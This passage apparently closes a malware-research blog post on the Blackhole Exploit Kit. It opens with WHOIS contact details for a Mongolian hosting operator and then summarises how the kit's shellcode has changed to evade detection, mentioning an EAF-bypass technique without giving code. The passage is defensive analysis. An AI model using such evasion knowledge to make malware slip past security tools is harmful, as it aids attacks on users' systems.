e-mail: tulga@g-mobile.mn
address: G-Mobile Corporation,
address: Chingeltei district 1st khoroo, Baga toiruu - 3/9
address: Ulaanbaatar, Mongolia
phone: +976-98101111
fax-no: +976-11-311195
country: MN
changed: tulga@g-mobile.mn 20070111
mnt-by: MAINT-MN-G-MOBILE

↑There are four more domains hosted in the same IP, there will be variation -
of possibilities for spam links to this infector.

This cases malware family photograph:

Conclusion:

The moral of this story is, the shellcode format of BHEK is starting to change.
the usual kernel32.dll API based calls is becoming undetected, yet it
downloaded the dropper binary containing the copy API now.
Is a slight modification but it successfully fools some
automation scheme. Further investigation made me realize the reason,
which are written in "Bypassing Export address table Address Filter(EAF)"
which can be viewed--->>[HERE]
And additionally a friend advised the crash PoC of it in here -->>[HERE]

Maybe shellzer must be patched for handling this new type of shellcode.
I must say, maybe I missed something, since most of reversing are done manually,
so please sorry about it and please advice me in the comment area.

I think some more other changes in BHEK distribution is on the run too.
Let's keep our eyes stick to it and see what happen.
BTW, the infected urls are all up and alive so please be careful with it.
Malware MUST Die!!